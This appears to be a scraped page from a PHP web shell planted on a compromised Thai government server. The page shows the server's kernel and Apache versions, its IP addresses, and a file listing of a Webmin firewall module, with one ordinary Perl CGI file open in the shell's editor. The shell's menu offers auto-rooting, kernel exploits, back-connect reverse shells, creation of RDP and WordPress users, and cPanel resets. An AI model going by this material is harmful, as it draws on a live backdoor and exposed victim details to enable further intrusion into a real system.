Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
libexec /
webmin /
shorewall /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
CHANGELOG
2.47
KB
-rw-r--r--
acl_security.pl
1
KB
-rwxr-xr-x
backup_config.pl
874
B
-rwxr-xr-x
check.cgi
503
B
-rwxr-xr-x
clear.cgi
313
B
-rwxr-xr-x
config
166
B
-rw-r--r--
config.info
509
B
-rw-r--r--
config.info.ca
565
B
-rw-r--r--
config.info.ca.UTF-8
573
B
-rw-r--r--
config.info.de
566
B
-rw-r--r--
config.info.de.UTF-8
566
B
-rw-r--r--
config.info.es
317
B
-rw-r--r--
config.info.es.UTF-8
317
B
-rw-r--r--
config.info.fr
502
B
-rw-r--r--
config.info.fr.UTF-8
502
B
-rw-r--r--
config.info.ms_MY
404
B
-rw-r--r--
config.info.ms_MY.UTF-8
404
B
-rw-r--r--
config.info.nl
394
B
-rw-r--r--
config.info.nl.UTF-8
394
B
-rw-r--r--
config.info.no
414
B
-rw-r--r--
config.info.no.UTF-8
414
B
-rw-r--r--
defaultacl
19
B
-rw-r--r--
delete.cgi
530
B
-rwxr-xr-x
down.cgi
403
B
-rwxr-xr-x
dump.cgi
337
B
-rwxr-xr-x
edit.cgi
1.69
KB
-rwxr-xr-x
editcmt.cgi
1014
B
-rwxr-xr-x
index.cgi
2.52
KB
-rwxr-xr-x
install_check.pl
380
B
-rwxr-xr-x
list.cgi
3.39
KB
-rwxr-xr-x
log_parser.pl
461
B
-rwxr-xr-x
manual_form.cgi
710
B
-rwxr-xr-x
manual_save.cgi
555
B
-rwxr-xr-x
module.info
169
B
-rw-r--r--
module.info.ca
98
B
-rw-r--r--
module.info.ca.UTF-8
112
B
-rw-r--r--
module.info.cz
27
B
-rw-r--r--
module.info.cz.UTF-8
33
B
-rw-r--r--
module.info.de
120
B
-rw-r--r--
module.info.de.UTF-8
132
B
-rw-r--r--
module.info.es
30
B
-rw-r--r--
module.info.es.UTF-8
36
B
-rw-r--r--
module.info.hu
25
B
-rw-r--r--
module.info.hu.UTF-8
32
B
-rw-r--r--
module.info.ms_MY
119
B
-rw-r--r--
module.info.ms_MY.UTF-8
131
B
-rw-r--r--
module.info.nl
27
B
-rw-r--r--
module.info.nl.UTF-8
33
B
-rw-r--r--
module.info.no
27
B
-rw-r--r--
module.info.no.UTF-8
33
B
-rw-r--r--
refresh.cgi
427
B
-rwxr-xr-x
restart.cgi
423
B
-rwxr-xr-x
save.cgi
1.08
KB
-rwxr-xr-x
savecmt.cgi
867
B
-rwxr-xr-x
shorewall-lib.pl
57.9
KB
-rwxr-xr-x
start.cgi
413
B
-rwxr-xr-x
status.cgi
343
B
-rwxr-xr-x
stop.cgi
312
B
-rwxr-xr-x
up.cgi
397
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : edit.cgi
#!/usr/bin/perl # edit.cgi # Display a form for editing or creating a table entry require './shorewall-lib.pl'; &ReadParse(); &get_clean_table_name(\%in); &can_access($in{'table'}) || &error($text{'list_ecannot'}); if ($in{'new'}) { &ui_print_header(undef, $text{$in{'tableclean'}."_create"}, ""); if ($in{'before'} ne '') { $msg = &text('edit_before', $in{'before'}+1); } elsif ($in{'after'} ne '') { $msg = &text('edit_after', $in{'after'}+1); } print "<center><font size=+1>$msg</font></center>\n" if ($msg); } else { &ui_print_header(undef, $text{$in{'tableclean'}."_edit"}, ""); $pfunc = &get_parser_func(\%in); @table = &read_table_file($in{'table'}, $pfunc); $row = $table[$in{'idx'}]; } print "<form action=save.cgi>\n"; print "<input type=hidden name=table value='$in{'table'}'>\n"; print "<input type=hidden name=idx value='$in{'idx'}'>\n"; print "<input type=hidden name=new value='$in{'new'}'>\n"; print "<input type=hidden name=before value='$in{'before'}'>\n"; print "<input type=hidden name=after value='$in{'after'}'>\n"; print "<table border width=100%>\n"; print "<tr $tb> <td><b>",$text{$in{'tableclean'}."_header"},"</b></td> </tr>\n"; print "<tr $cb> <td><table width=100%>\n"; $ffunc = $in{'tableclean'}."_form"; &$ffunc(@$row); print "</table></td></tr></table>\n"; print "<table width=100%>\n"; if ($in{'new'}) { print "<td><input type=submit value='$text{'create'}'></td>\n"; } else { print "<td><input type=submit value='$text{'save'}'></td>\n"; print "<td align=right><input type=submit name=delete ", "value='$text{'delete'}'></td>\n"; } print "</table>\n"; print "</form>\n"; &ui_print_footer("list.cgi?table=$in{'table'}", $text{$in{'tableclean'}."_return"});
Close